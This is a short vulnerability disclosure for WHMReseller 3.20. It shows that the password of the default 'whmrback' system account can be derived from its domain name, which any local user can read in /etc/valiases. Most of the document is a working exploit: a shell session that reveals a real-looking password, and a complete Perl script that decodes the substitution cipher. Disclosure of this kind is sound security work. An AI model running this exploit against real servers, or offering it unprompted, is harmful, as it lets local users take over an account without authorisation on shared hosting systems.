WHMReseller 3.20 - any local user could obtain the password to the default "whmrback" account



DESCRIPTION


When WHMReseller is installed it adds a system account with the usename "whmrback" with a randomly (not random) generated domain name. The password for the whmrback account can be determined from its associated domain name.



IMPACT


Local users could access the whmrback account.


This worked because the domain name for this account can be found in in the /etc/valiases directory, with a prefix of "whmr-":

[user@host ~]$ ls -l /etc/valiases/whmr*
-rw-r--r--  1 whmrback mail 28 Aug 25 15:27 /etc/valiases/whmr-cadzcdcfmf.com
[user@host ~]$ ./whmreseller_whmrback_pass.pl cadzcdcfmf
The password to the whmrback account is: b06yb6bhdh


A trivial character substitution cipher proves that "cadzcdcfmf" is equal to "b06yb6bhdh", which is the password for the whmrback account.


#!/usr/bin/perl

use strict;
use warnings;

my $whmrback = shift or die;
my $pass;

my %hash = qw(
    h 9 1 a c b k r b 1 a 0 d 6 s e o x
    f h t 3 w f 4 j r 8 e v j o l w x g
    2 n 7 t n 4 6 2 y 7 0 5 9 s 3 u p q
    q m z y m d 8 i i c g k 5 p v l u z
);

$whmrback = reverse $whmrback;

for ( 1 .. length $whmrback )
{
    my $tmp = chop $whmrback;

    for my $k ( keys %hash )
    {
        if ( $tmp eq $k ) {
            $pass .= $hash{$k};
        }
    }
}

print "The password to the whmrback account is: $pass\n";